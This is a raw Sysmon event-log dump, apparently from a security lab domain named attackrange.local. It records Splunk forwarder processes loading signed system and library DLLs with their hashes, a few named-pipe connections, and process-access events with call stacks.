Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001606174Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606173Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606172Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606171Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136\srvsvcC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001606170Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606169Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001606168Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606167Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 
734700x80000000000000001606166Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606165Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606164Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606163Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606162Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606161Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606160Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606159Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program 
734700x80000000000000001606234Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606233Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606232Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606231Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606230Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606229Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606228Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606227Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606226Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606225Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606224Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606223Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606222Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606221Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606220Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606219Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared 
LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606218Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606217Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606216Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606215Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 
librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606214Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606213Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606212Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000001606211Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 
(rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x80000000000000001606210Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606209Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000001606208Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001606207Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001606206Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606205Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606204Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 
10341000x80000000000000001606203Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:30.358{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A86-6080-C360-00000000BB01}5724C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095236Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:30.511{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095235Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:30.511{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
